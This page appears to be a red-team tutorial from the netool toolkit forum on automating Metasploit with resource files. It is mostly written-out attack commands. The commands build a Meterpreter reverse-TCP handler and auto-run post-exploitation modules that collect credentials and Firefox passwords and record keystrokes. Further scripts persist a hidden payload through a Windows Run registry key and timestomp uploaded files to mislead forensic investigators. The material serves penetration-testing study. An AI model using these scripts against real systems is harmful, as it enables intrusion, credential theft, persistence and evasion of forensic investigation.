netool toolkit 4.6 / Discussion / Blog - Red Team - Development: -:[ metasploit

.::[ Metasploit - resource files ]::

               "Working With Resource Files"

Resource files can greatly speed up testing and development times as well as allow the user to automate many tasks. Besides loading a resource file from within msfconsole, they can also be passed at startup using the '-r' flag. The simple example below creates a resource file to display the Metasploit version number.

  touch version.rc
  echo 'version' >> version.rc
  run: msfconsole -r version.rc
  or:  msfconsole -r /root/version.rc
  or:  msf> resource /root/version.rc

           "How To load your working dir at msf start?"

this resource file will load a third-part module tree for the path so you can point Metasploit at your 0-day, exploits, encoders, payloads, if your are developing exploits/auxiliarys/post-modules in ruby then this is the perfect option for you to load our working dir into metasploit framework database...

  touch startconf.rc
  echo 'loadpath /home/secret/0Day' >> startconf.rc
  run: msfconsole -r startconf.rc

          "Build shell_listenner.rc (multi-handler)"

Lets create a short script to start up multi-handler for us. Here we are using the exploit multi handler to receive our payload, we specify that the payload is a Meterpreter reverse_tcp payload, we set the payload option, we set local host option, we make sure that the multi handler will not exit once it receives a session since we might need to re-establish one due to an error or we might be testing under different versions of Windows from different target hosts.

  touch shell_listenner.rc
  echo 'use exploit/multi/handler' >> shell_listenner.rc
  echo 'set PAYLOAD windows/meterpreter/reverse_tcp' >> shell_listenner.rc
  echo 'set LPORT 666' >> shell_listenner.rc
  echo 'set LHOST 192.168.1.68' >> shell_listenner.rc
  echo 'set ExitOnSession false' >> shell_listenner.rc
  echo 'exploit -j -z' >> shell_listenner.rc

  run: msfconsole -r shell_listenner.rc
  or:  msfconsole -r /root/shell_listenner.rc
  or:  msf > resource shell_listenner.rc

     "Automation is the name of the Pentest game (hd moore)"

Metasploit auto run scripts are great when you need a module to run automatically post exploitation. Getting a single script to run post meterpreter is pretty easy, but what if you wanted multiple post scripts to run? From the msfconsole prompt run:

  msf > set AutoRunScript multi_console_command -rc /root/autoruncommands.rc

                   "Build autoruncommands.rc"

  touch autoruncommands.rc
  echo 'run post/windows/manage/migrate' >> autoruncommands.rc
  echo 'run post/windows/gather/checkvm' >> autoruncommands.rc
  echo 'run post/windows/gather/credential_collector' >> autoruncommands.rc
  echo 'run post/multi/gather/firefox_creds' >> autoruncommands.rc
  echo 'run post/windows/capture/keylog_recorder' >> autoruncommands.rc

Now save the file autoruncommands.rc inside of the root folder. And run it like this:

  msf > run multi_console_command -rc /root/autoruncommands.rc

Or run it on the multi-handler using AutoRunScript= like this:

   msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.68 LPORT=666 AutoRunScript='multi_console_command -rc /root/autoruncommands.rc' E

This way we only need to config in the handler the AutoRunScript= to point to our resource file, so everytime the handler opens a session the AutoRunScript= will run all post-exploitation modules writen inside 'autocommands.rc' file.

      "GO FURTHER IN POST-EXPLOITATION 'POST-AUTO.RC'"

The follow example shows how we can persiste a payload in post-exploitation time. Lets say that we have build befor the powershell.bat payload and hidden.vbs script to execute powershell.bat in one hidden CMD windows, So how to persiste the powershell.bat using resource files?

we use the listenner 'AutoRunScript' flag to lunch the post-auto.rc file containing instructions to migrate the current session to winint.exe priviliged process, upload the 2 files and insert a registry value in targets regedit. This way when the Listenner (multi-handler) recibes the remote connection it will lunch the 'post-auto.rc' againts the currente meterpreter session open (ID 1)...

  "Post-Auto-rc"
  touch Post-Auto.rc
  echo 'sysinfo' >> Post-Auto.rc
  echo 'run migrate -n wininit.exe' >> Post-Auto.rc
  echo 'upload /var/www/powershell.bat C:\\Windows\\System32\\powershell.bat' >> Post-Auto.rc
  echo 'upload /var/www/hidden.vbs C:\\Windows\\System32\\hidden.vbs' >> Post-Auto.rc
  echo "reg setval -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -v persistence -d 'C:\windows\system32\hidden.vbs'" >> Post-Auto.rc
  echo 'reg enumkey -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' >> Post-Auto.rc


  "Run msf Listenner"
  msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.68 LPORT=666 AutoRunScript='multi_console_command -rc /root/Post-Auto.rc' E

            "PERSISTENCE CLEANUP RESOURCE FILE"

Some metasploit developers are using resource files to clean recent configs done at post-exploitation time. 'darkoperator' developed the 'persistence.rb' to upload one meterpreter_reverse payload and one vbscript file, containing instructions to add a registry key (startup) pointing to the path were the payload its stored in target system, the module will also output one resource file to revert the changes made.

"persistence.rb script by darkoperator (cleanup function)"

In this next example we are going to build one resource file (clean_post-auto.rc) to revert the configs made in target host by the action of 'post-auto.rc' previous example "persist a payload in post exploitation time" cleanup script.

  "clean_post-auto.rc"
  touch clean_post-auto.rc
  echo 'run migrate -n wininit.exe' >> clean_post-auto.rc
  echo 'del C:\Windows\System32\powershell.bat' >> clean_post-auto.rc
  echo 'del C:\Windows\System32\hidden.vbs' >> clean_post-auto.rc
  echo 'reg deletekey -k HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -v persistence' >> clean_post-auto.rc

  "Run msf Listenner"
  msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.68 LPORT=666 AutoRunScript='multi_console_command -rc /root/clean_post-auto.rc' E

             "PORT NMAP.XML LOGFILE TO MSF DB"

In this next example we are going to use Nmap framework to scan our LOCAL LAN in search of live hosts, and output the logfile in [.xml] format, then we are going to build one resource file [msfdb.rc] to be hable to port the [.xml] logfile to metasploit database, so the hosts found can be accessed in metasploit...

  "scanning using nmap"
  nmap -sV -Pn -p 1-1000 -O --open -oX /root/Random-Hosts.xml 192.168.1.0/24

  "build resource file"
  touch msfdb.rc
  echo 'db_import /root/Random-Hosts.xml' >> /root/msfdb.rc
  echo 'hosts' >> /root/msfdb.rc
  echo 'services' >> /root/msfdb.rc

  "start metasploit database"
  service metasploit start > /dev/null 2>&1
  msfconsole -r /root/msfdb.rc

  "clean database"
  msf > hosts -d
  msf > services -d

      "MANIPULATE TIMESTOMP (modified|accessed|created)"

Sometimes in post-exploitation we need to cover our tracks in target system to fool forensics, one way to do that its to manipulate the MACE values (timestomp) of a file or a directory (recursive).

In the follow example we are going to upload a file to target host and change its MACE value to another date/time so the file appears to be created/accessed in the year 2013, the "-r" flag will change the MACE of all files inside temp folder.

  "build resource file"
  touch timereset.rc
  echo 'run migrate -n wininit.exe' >> timereset.rc
  echo 'upload /var/www/powershell.bat %temp%\\powershell.bat' >> timereset.rc
  echo 'timestomp -r %temp% "21/1/2013 23:26:35"' >> timereset.rc

  "run resource file"
  meterpreter > resource /root/timereset.rc

         "Post Module Reference - Metasploit Unleashed"

http://www.offensive-security.com/metasploit-unleashed/Post_Module_Reference

             "How to exploit using resource script?"

http://solutionsatexperts.com/exploit-using-resource-script-metasploit/
http://www.securityartwork.es/2012/05/21/uso-eficiente-de-metasploit-resource-scripts/

             "resource files video tutorial"

Video not available

        "resource files video tutorial (netool toolkit)"

Video not available

                    "scan WAN network"
            [port nmap.xml logfile to msf db]

Video not available

Last edit: pedro ubuntu 2015-02-23

-:[ metasploit - resource files ]:-

MitM pentesting opensource toolkit

Forums

Help

-:[ metasploit - resource files ]:-

.::[ Metasploit - resource files ]::

-:[ metasploit - resource files ]:-

MitM pentesting opensource toolkit

Forums

Help

-:[ metasploit - resource files ]:- document.SUBSCRIPTION_OPTIONS = { "thing": "topic", "subscribed": false, "url": "subscribe", "icon": { "css": "fa fa-envelope-o" } };

.::[ Metasploit - resource files ]::

-:[ metasploit - resource files ]:-